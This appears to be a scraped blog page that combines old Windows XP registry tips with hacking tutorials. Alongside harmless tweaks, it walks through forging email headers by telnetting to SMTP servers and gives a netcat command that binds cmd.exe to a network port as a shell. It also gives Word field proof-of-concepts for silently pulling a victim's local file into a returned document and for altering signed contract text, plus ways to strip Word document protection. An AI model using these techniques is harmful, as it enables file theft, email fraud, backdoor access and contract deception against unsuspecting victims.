To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg file would be: REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."
3) Great trick Lock ur PC yourself
lock ur pc.. open notepad copy and paste the script below and save it .VBS extentionThis wil create a shortcut.. run(click) it
set WshShell = WScript.CreateObject("WScript.Shell")set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("Desktop") & "\LockWorkstation.lnk")oShellLink.TargetPath = "%windir%\system32\rundll32.exe"oShellLink.Arguments = "user32.dll,LockWorkStation"oShellLink.Save
first select a folder for example i'll use a folder name movies in D drive D:\movies\
in the same drive u create a text file and type
ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
and save it as loc.bat
again u type in a notepad as
ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
and save it as key.bat
now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and whn u double click key the control panel will change to normal folder..
there are two more different tricks in dis site to lock ur pc down in a unique ways.. donno where i have typed it.. !!!
4) Deleting System Options from the Start menu :
You can actually remove the Find and Run options from the start menu by performing a simple registry hack. Again like always Launch the registry editor and scroll down to the below key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Right-click on the right pane and select New, DWORD Value. Name it NoFind.(To remove the RUN option name it NoRun). Double-click the newly create DWORD to edit it's value and enter 1 as its value. This will disable the FIND option of the Start Menu and will also disable the default Shortcut key(F3 for Find.) To restore the Run or find command modify the value of the DWORD to 0 or simply Delete the DWORD value.
5) Cleaning Recent Docs Menu and the RUN MRU :
The Recent Docs menu can be easily disabled by editing the Registry. To do this go to the following Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Now in the right pane, create a new DWORD value by the name: NoRecentDocsMenu and set it's value to 1. Restart Explorer to save the changes. You can also clear the RUN MRU history. All the listings are stored in the key: HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMR U You can delete individual listings or the entire listing. To delete History of Find listings go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU and delete
6) Can u Delete Recycle Bin?
1 thing is 4 sure, delete option can be added 2 recycle bin...the old registry thing will work out.....* launch d registry...* open HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder* to add a rename and delete option, change the Dword attribute to 70 01 00 20* refresh and reboot the system..... u r done.
PS: always backup ur data as well as registry b4 attempting 2 work on it if u r a newbie....

7) To change the icons used for specific drives in explorer
Open regedit by typing regedit into start->run
then navigate to
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer
now create a key(KEY not VALUE!!) called DriveIcons under Explorer...now within DriveIcons, create another key with the drive letter you want to change (e.g.,HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\K)...create another key within the drive letter key called DefaultIcon... now set the default String value equal to the icon you want to use. if you have a file that has more than one icon in it, such as a DLL file, use the standard C:\full_path\icon_file.dll,n <file:///C:/full_path/icon_file.dll,n>) where n is the number of the icon within the file icon_file.dll...
~ c h e e r s! ~
More

change drive icons.....
first of all copy a icon file to the root of the drive.example: c:\icon.ico
then create a file called: autorun.inf in c:\autorun.infthen open that file and type the following:
[autorun]icon=icon.ico
save and close the file.
now open my computer and resfresh.. and woh! icon changed....you can apply to other drives too.
be carefull:
"autorun.inf" and "ico.ico" must be in the root of the drive.example: c:\autorun.inf and c:\icon.ico.same on the root.
ENJOY, this works on 98 too!!!!!!!!!!!!!!!!!!

8) Hacking windows SEND TO MENU
I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.
How often do you copy songs from a CD? Or some photos from a CD?
What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.
This sounds simple and you can do it in less than sixty seconds.You can create your own BASKET.
First you’ll need access to hidden files. So change your view settings to make all hidden files visible. Tools -> folder options -> view (tab) and select the show hidden files and folders. go to parent drive:/documents and settings/(user name)/send to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.
Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.
5. DONE
~ c h e e r s! ~
9) How to remove the shortcut arrow from the desktop ?
Open Regedit and navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Shell IconsBackup the key. More information. In the right-pane, create a new String value named "29"Double-click 29 and set its data to:
C:\Windows\System32\shell32.dll,50 (an empty icon) Close Registry Editor.
Now,
Right-click Desktop, choose Properties Click the Appearance Tab.
Click Advanced button.
Choose Icon from the drop-down list
Set it's size to 31 and press OK, OK.
The changes will be applied now. Repeat the above steps and then set the Icon size back to 32 (defaults). The above steps are required to force Windows to redraw the icons
10) The Complete list ! Can u Do it!
Try to create a folder in Windows with either of these names--"con" or "nul" or "Aux" or "Lpt1".Windows will not let u create ....
This s coz these refer 2 some well known ports....-con corresponds to the console-Lpt1 corresponds to printer and so on....
well dat was common but hw bt this ? Try these more
CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
TURN NUMLOCK ON AT LOGON.!!
NumLock does not toggle on by default (system-wide), even if you have it set in your PC's BIOS, because of XP's multi-user functionality. Guess Microsoft doesn't know everyone actually turns it on, which should be reason enough for what acts as "default"...Anyway, you can hack the Windows Registry to change this behavior, or run a script at logon to turn NumLock on.1. To enable NumLock through the Registry:* Open Windows' Registry Editor (START > RUN, type "REGEDIT").*. Navigate to HKEY_USERS\.Default\Control Panel\Keyboard.*. Change the value for InitialKeyboardIndicators from 0 to 2.2. To enable NumLock using a script, see this MS Knowledgebase article for complete instructions:CODEhttp://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q262625Option 1 is the quicker method, but if you have more than one user on your system and one or more don't want NumLock on (stranger things have been known of), then option 2 is the way to go since it allows you to only attach the script to specific users.
REMOVING SERVICES DEPENDENCIES.!!
This will allow you to disable a service or uninstall it from your system without effecting another service that depends on it. Here's how you do it1. After you have set your services the way you want them and you have disabled/uninstalled something that another services depends on, run "regedit"2. Under HKEY_LOCAL_MACHINE\System\find the service that will not function, do to another service being disabled/uninstall (found in ControlSet001\Services, ControlSet002\Services, and CurrentControlSet\Services)3. Once you have found the service right-click on the string value, "DependOnService,"and modify4. You should now see a list of services that it is dependent on. Simply delete the service that you have disabled/uninstalled5. Restart your computer and your ready to go Disclaimer REMEMBER TO BACKUP YOU REGISTRY FIRST I'm not totaly sure if this will have any negative effects on your system. I used this method after uninstalling "Netbios over Tcpip" from my system completely, so that my Dhcp service would function and I have had NO negative effects on my system.

TURN ON UR PC IN JUST 10 SECONDS
Aight so u wanna know how to turn the pc on in 10 seconds (may vary)Aight heres what u have to do to turn ur pc on in 10 seconds
Aite Click on the start button then press R it will take u to Run well go to runn type Regeditpress enterthis will open Registery Editornow look for the key
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex
now there find the Key Called"Startup Delay"Double Click On ItNow where its BaseClick DecimalNow its Default Value Is 4800000 (75300:hexadecimal)Change The Value To 40000here u go u have done itnow close the Registery Editor and Restart Your Computer

HACKING WINDOW XP NEW VERSION

HACKING WINDOW XP NEW VERSION


XPHacking With Windows XP So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?
The key to doing amazing things with XP is as simple as D O S. Yes, that's right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Window 3, and DOS only operating systems.
The other DOS, which comes only with XP, 2000 and NT, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won?t run right in cmd.exe will work in command.com
note : m not comparing bash to dos
DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.
****************You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won't protect you because Microsoft owns Hotmail and they will never give you permission.********************************You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before demonstrating that you can hack on a school computer.****************
So how do you turn on DOS? Click All Programs -> Accessories -> Command PromptThat runs cmd.exe. You should see a black screen with white text on it, saying something like this:
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\>
Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.
TCP/IP commands:telnetnetstatnslookuptracertpingftp
NetBIOS commands (just some examples):nbtstatnet usenet viewnet localgroup
TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs. along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.
NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. I will cover NetBIOS commands in the next article to XP Hacking.
The queen of hacker commands is telnet. To get Windows help for telnet, in the cmd.exe window give the command:
C:\>telnet /?
Here's what you will get:
telnet [-a][-e escape char][-f log file][-l user][-t term][host[port]]
-a Attempt automatic logon. Same as --l option except uses the currently logged on user's name.-e Escape character to enter telnet cclient prompt.-f File name for client side logging-l Specifies the user name to log in with on the remote system. Requires that the remote system support the TELNET ENVIRON option.-t Specifies terminal type. Supportedd term types are vt100, vt52, ansi and vtnt only.host Specifies the hostname or IP address of the remote computer to connect to.port Specifies a port number or service name.
****************Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn?t block it.********************************Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name. ****************
The simplest use of telnet is to log into a remote computer. Give the command:
C:/>telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)
If this computer is set up to let people log into accounts, you may get the message:
login:
Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.
****************Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.****************
Then comes the message:
Password:
Again, be exact in typing in your password.
What if this doesn't work?
Every day people write to me complaining they can't telnet. That is usually because they try to telnet into a computer, or a port on a computer that is set up to refuse telnet connections. Here's what it might look like when a computer refuses a telnet connection:
C:\ >telnet 10.0.0.3Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Or you might see:
C:\ >telnet hotmail.comConnecting To hotmail.com...Could not open connection to the host, on port 23. No connection could be made because the target machine actively refused it.
If you just give the telnet command without giving a port number, it will automatically try to connect on port 23, which sometimes runs a telnet server.
**************Newbie note: your Windows computer has a telnet client program, meaning it will let you telnet out of it. However you have to install a telnet server before anyone can telnet into port 23 on your computer.*************
If telnet failed to connect, possibly the computer you were trying to telnet into was down or just plain no longer in existence. Maybe the people who run that computer don't want you to telnet into it.
Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed -without doing anything illegal --against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:
C:/telnet freeshell.org 22
SSH-1.99-OpenSSH_3.4p1
That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at http://freeshell.org/ . You can get a free SSH client program from http://winfiles.com/ .
***************You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.*************
Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.
If I try to telnet to this email program from outside this computer, here's what happens:
C:\>telnet 10.0.0.3 25Connecting To 10.0.0.3...Could not open connection to the host, on port 25. No connection could be made because the target machine actively refused it.
However, if I log into an account on 10.0.0.3 and then telnet from inside to port 25, here's what I get:
Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1Have a lot of fun...cmeinel@test-box:~> telnet localhost 25Trying ::1...telnet: connect to address ::1: Connection refusedTrying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical address meaning localhost, the same computer you are logged into]Connected to localhost.Escape character is '^]'.220 test-box.local ESMTP Postfix
The reason I keep this port 25 hidden behind a firewall is to keep people from using it to try to break in or to forge email. Now the ubergeniuses reading this will start to make fun of me because no Internet address that begins with 10. is reachable from the Internet. However, sometimes I place this "test-box" computer online with a static Internet address, meaning whenever it is on the Internet, it always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.
***************Newbie note: What is all this about headers? It's stuff at the beginning of an email that may - or may not - tell you a lot about where it came from and when. To see full headers, in Outlook click view -> full headers. In Eudora, click the "Blah blah blah" icon.****************
Want a computer you can telnet into and mess around with, and not get into trouble no matter what you do to it? I've set up my techbroker.com (206.61.52.33) with user xyz, password guest for you to play with. Here's how to forge email to xyz@techbroker.com using telnet. Start with the command:
C:\>telnet techbroker.com 25Connecting To Techbroker.com
220 Service ready
Now you type in who you want the message to appear to come from:
helo santa@techbroker.comTechbroker.com will answer:
250 host ready
Next type in your mail from address:
mail from:santa@techbroker.com
250 Requested mail action okay, completed
Your next command:
rcpt to:xyz@techbroker.com250 Requested mail action okay, completed
Your next command:data354 Start main input; end with .
just means hit return. In case you can't see that little period between the s, what you do to end composing your email is to hit enter, type a period, then hit enter again. Anyhow, try typing:
This is a test..250 Requested mail action okay, completedquit221 Service closing transmission channel
Connection to host lost.
Using techbroker's mail server, even if you enable full headers, the message we just composed looks like:
Status: RX-status: N
This is a test.
That's a pretty pathetic forged email, huh? No "from", no date. However, you can make your headers better by using a trick with the data command. After you give it, you can insert as many headers as you choose. The trick is easier to show than explain:
220 Service readyhelo santa@northpole.org250 host readymail from:santa@northpole.com250 Requested mail action okay, completedrcpt to:cmeinel@techbroker.com250 Requested mail action okay, completeddata354 Start main input; end with .from:santa@deer.northpole.orgDate: Mon, 21 Oct 2002 10:09:16 -0500Subject: RudolfThis is a Santa test..250 Requested mail action okay, completedquit221 Service closing transmission channel
Connection to host lost.
The message then looks like:
from:santa@deer.northpole.orgDate: Mon, 21 Oct 2002 10:09:16 -0500Subject: RudolfThis is a Santa test.
The trick is to start each line you want in the headers with one word followed by a colon, and the a line followed by "return". As soon as you write a line that doesn't begin this way, the rest of what you type goes into the body of the email.
Notice that the santa@northpole.com from the "mail from:" command didn't show up in the header. Some mail servers would show both "from" addresses.
You can forge email on techbroker.com within one strict limitation. Your email has to go to someone at techbroker.com. If you can find any way to send email to someone outside techbroker, let us know, because you will have broken our security, muhahaha! Don't worry, you have my permission.
Next, you can read the email you forge on techbroker.com via telnet:
C:\>telnet techbroker.com 110
+OK <30961.5910984301@techbroker.com> service ready
Give this command:user xyz+OK user is known
Then type in this:pass test+OK mail drop has 2 message(s)
retr 1+OK message followsThis is a test.
If you want to know all possible commands, give this command:
help+OK help list followsUSER userPASS passwordSTATLIST [message]RETR messageDELE messageNOOPRSETQUITAPOP user md5TOP message linesUIDL [message]HELP
Unless you use a weird online provider like AOL, you can use these same tricks to send and receive your own email. Or you can forge email to a friend by telnetting to his or her online provider's email sending computer(s).
With most online providers you need to get the exact name of their email computer(s). Often it is simply mail.targetcomputer.com (substitute the name of the online provider for targetcomputer). If this doesn't work, you can find out the name of their email server with the DOS nslookup program, which only runs from cmd.exe. Here's an example:
C:\ >nslookupDefault Server: DNS1.wurld.netAddress: 206.61.52.11
> set q=mx> dimensional.comServer: DNS1.wurld.netAddress: 206.61.52.11
dimensional.com MX preference = 5, mail exchanger =mail.dimensional.comdimensional.com MX preference = 10, mail exchanger =mx2.dimensional.comdimensional.com MX preference = 20, mail exchanger =mx3.dimensional.comdimensional.com nameserver = ns.dimensional.comdimensional.com nameserver = ns-1.dimensional.comdimensional.com nameserver = ns-2.dimensional.comdimensional.com nameserver = ns-3.dimensional.comdimensional.com nameserver = ns-4.dimensional.commail.dimensional.com internet address = 206.124.0.11mx2.dimensional.com internet address = 206.124.0.30mx3.dimensional.com internet address = 209.98.32.54ns.dimensional.com internet address = 206.124.0.10ns.dimensional.com internet address = 206.124.26.254ns.dimensional.com internet address = 206.124.0.254ns.dimensional.com internet address = 206.124.1.254ns.dimensional.com internet address = 209.98.32.54ns.dimensional.com internet address = 206.124.0.32ns.dimensional.com internet address = 206.124.0.30ns.dimensional.com internet address = 206.124.0.25ns.dimensional.com internet address = 206.124.0.15ns.dimensional.com internet address = 206.124.0.21ns.dimensional.com internet address = 206.124.0.9ns-1.dimensional.com internet address = 206.124.26.254ns-2.dimensional.com internet address = 209.98.32.54ns-3.dimensional.com internet address = 206.124.1.254ns-4.dimensional.com internet address = 206.124.0.254>
The lines that tell you what computers will let you forge email to people with @dimensional.com addresses are:
dimensional.com MX preference = 5, mail exchanger =mail.dimensional.comdimensional.com MX preference = 10, mail exchanger =mx2.dimensional.comdimensional.com MX preference = 20, mail exchanger =mx3.dimensional.com
MX stands for mail exchange. The lower the preference number, the more they would like you to use that address for email.If that lowest number server is too busy, then try another server.
Sometimes when you ask about a mail server, nslookup will give you this kind of error message:
DNS request timed out.timeout was 2 seconds.DNS request timed out.timeout was 2 seconds.*** Request to [207.217.120.202] timed-out
To get around this problem, you need to find out what are the domain servers for your target online provider. A good place to start looking is http://netsol.com/cgi-bin/whois/whois . If this doesn't work, see http://happyhacker.org/HHA/fightback.shtml for how to find the domain servers for any Internet address.
****************Newbie note: A domain name server provides information on the names and numbers assigned to computers on the Internet. For example, dns1.wurld.net and dns2.wurld.net contain information on happyhacker.org, techbroker.com, securitynewsportal.com, thirdpig.com and sage-inc.com. When you query dns1.wurld.net about other computers, it might have to go hunting for that information from other name servers. That's why you might get a timed out failure.***************
Once you know the domain servers for an online service, set one of them for the server for your nslookup program. Here's how you do it:
C:\ >nslookupDefault Server: DNS1.wurld.netAddress: 206.61.52.11
Now give the command:
> server 207.217.126.41Default Server: ns1.earthlink.netAddress: 207.217.126.41
Next command should be:> set q=mx> earthlink.netServer: ns1.earthlink.netAddress: 207.217.126.41
earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.netearthlink.net MX preference = 5, mail exchanger = mx05.earthlink.netearthlink.net MX preference = 5, mail exchanger = mx06.earthlink.netearthlink.net MX preference = 5, mail exchanger = mx00.earthlink.netearthlink.net MX preference = 5, mail exchanger = mx01.earthlink.netearthlink.net MX preference = 5, mail exchanger = mx02.earthlink.netearthlink.net MX preference = 5, mail exchanger = mx03.earthlink.netearthlink.net nameserver = ns3.earthlink.netearthlink.net nameserver = ns1.earthlink.netearthlink.net nameserver = ns2.earthlink.netmx00.earthlink.net internet address = 207.217.120.28mx01.earthlink.net internet address = 207.217.120.29mx02.earthlink.net internet address = 207.217.120.79mx03.earthlink.net internet address = 207.217.120.78mx04.earthlink.net internet address = 207.217.120.249mx05.earthlink.net internet address = 207.217.120.31mx06.earthlink.net internet address = 207.217.120.23ns1.earthlink.net internet address = 207.217.126.41ns2.earthlink.net internet address = 207.217.77.42ns3.earthlink.net internet address = 207.217.120.43>
Your own online service will usually not mind and may even be glad if you use telnet to read your email. Sometimes a malicious person or faulty email program will send you a message that is so screwed up that your email program can't download it. With telnet you can manually delete the bad email. Otherwise tech support has to do it for you.
If you think about it, this ability to forge email is a huge temptation to spammers. How can your online provider keep the bad guys from filling up a victim's email box with garbage? The first time a bad guy tries this, probably nothing will stop him or her. The second time the online provider might block the bad guy at the firewall, maybe call the bad guy's online provider and kick him or her and maybe get the bad guy busted or sued.
**************You can go to jail warning: Sending hundreds or thousands of junk emails to bomb someone's email account is a felony in the US.***************
***************You can get sued warning: Spamming, where you send only one email to each person, but send thousands or millions of emails, is borderline legal. However, spammers have been successfully sued when they forge the email addresses of innocent people as senders of their spam.****************
Now that you know how to read and write email with telnet, you definitely have something you can use to show off with. Happy hacking!
Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a free program written by Weld Pond and Hobbit, and available from many sites, for examplehttp://www.atstake.com/research/tools/#network_utilities . It is basically telnet on steroids. For example, using netcat, you can set up a port on your Windows computer to allow people to telnet into a DOS shell by using this command:
C:\>nc -L -p 5000 -t -e cmd.exe
You can specify a different port number than 5000. Just make sure it doesn't conflict with another port by checking with the netstat command. Then you and your friends, enemies and random losers can either telnet in or netcat in with the command:
C:\>nc -v [ipaddress of target] [port]
Of course you will probably get hacked for setting up this port. However, if you set up a sniffer to keep track of the action, you can turn this scary back door into a fascinating honeypot. For example, you could run it on port 23 and watch all the hackers who attack with telnet hoping to log in. With some programming you could even fake a unix-like login sequence and play some tricks on your attackers.

MICROSOFT OFFICE HACK

MICROSOFT OFFICE HACK

I have stumbled onto a couple potential security issue in MicrosoftWord blogs i would like to share. In both cases the adversary (mis)usesfields to perpetrate the attack. It's important to note that fields are not macros and, as faras I know, cannot be disabled by the user. I am providing a basicdescription along with a proof-of-concept demo. I am fairly certainthat someone with free time and imagination can expand on theseprinciples, possibly applying them to other products.
Following tradition I'll use Hacker and Victim as the two parties involved.Hacker will be the adversary.
1) Document collaboration spyware.

Attack Basics: Hacker sends Victim a Word document for revisions. After Victimedits, saves, and mails it back to Hacker the file will also includecontents of another file(s) from Victim's computer that Hacker hasspecified a priori. To achieve this, Hacker embeds the INCLUDETEXT fieldinto the document. The field results in inclusion of a specified fileinto the current document. Of course, Hacker must be careful include itin such a way that it does not become apparent to Victim. Hacker can do allthe usual things like hidden text, small white font, etc. Alternatively(and in my opinion cleaner, she can embed the INCLUDETEXT field withina dummy IF field that always returns an empty string. In this case, theonly way Victim can notice the included file is if he goes browsingthrough field codes.
Attack Improvements: The disadvantage of the basic attack is that Hackermust rely on Victim to update the INCLUDETEXT field to import the file. Ifthe document is large and contains tables of contents, figures, etc.then Victim is very likely to update all the fields. However, Hacker wouldlike to make sure that the field gets updated regardless of whether Victimdoes it manually or not. Automatic updates can be forced if a DATEfield is embedded into the INCLUDETEXT and it is the last date field inthe document (don't ask me why).
Proof of concept: Inserting the following field structure into thefooter of the last page will steal the contents of c:a.txt on thetarget's computer. Keep in mind the plain curly braces below mustactually be replaced with Word field braces (you can either use themenus to insert fields one by one, or ask google how to do it by hand).
{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }

Countermeasures: The only thing you can do now is decide how paranoidyou want to be. If you must edit and send out a Word file with unknownorigins, you may want to manually go through the fields. It would benice to be able to force user confirmation (via a dialog box) for allincludes. Alternatively one could write a scanner. Of course an optionalstandalone checker will never be used by those most at risk.
2) Oblivious signing

Attack Basics: Hacker and Victim wants to sign a contract saying that Hackerwill pay Victim $100. Hacker types it up as a Word document and bothdigitally sign it. In a few days Victim comes to Hacker to collect hismoney. To his surprise, Hacker presents him with a Word document thatstates he owes her $100. Hacker also has a valid signature from Victim forthe new document. In fact, it is the exact same signature as for thecontract Victim remembers signing and, to Victim's great amazement, the twoWord documents are actually identical in hex. What Hacker did was insertan IF field that branched on an external input such as date orfilename. Thus even though the sign contents remained the same, thedisplayed contents changed because they were partially dependent onunsigned inputs. The basic point is that very few users know the actualcontents of their Word documents and it should be obvious that oneshould never sign what one cannot read. Of course, Victim could contestthe contract in court. An expert witness (that's actually an expert)could easily demonstrate that there are unsigned inputs and thereforeit is not clear which version was actually signed. Thus Victim can get outof the fraudulent contract. However, the same logic will hold for Hackerand she gets away without paying Victim $100 she signed for. Thus, anadversary can build in a free escape clause. Note that I am justspeculating about all the legal aspects.
Proof of concept: Inserting the following field structure at the tailof the document will cause "Hello" to be displayed if the filename is"a.doc" and "Bye" otherwise.
{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }
Update : this flaw has been fixed in office 2003 onwardsbut still works in office 2000 and even sometimes in 2002/03
__________________________________________________________________________
We canconsistently crash Word 2000 using the following method:
1) Open up any text/document editor such as notepad or wordpad2) type a single word (must be a known word, no punctuation).3) highlight the whole word and CTRL+C4) launch word 20005) CTRL+V6) press HOME to take you to the start of the line7) type I8) hit the space bar
This consistenly crashes Word 2000 with the following errormessage:
DDE Server Window: WINWORD.EXE - Application ErrorThe instruction at "0x3076a63e" referenced memory at "0x00000000". Thememory could not be "read".


Vulnerability:
remove office passwordsVulnerable:
MS Word (Win2K/XP)

Example 1
1) Open MS Word with a new/blank page
2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc
3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...

Example 2
1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)
2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)
3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)
4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a passwor

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Aruz Parajuli, Aruz Parajuli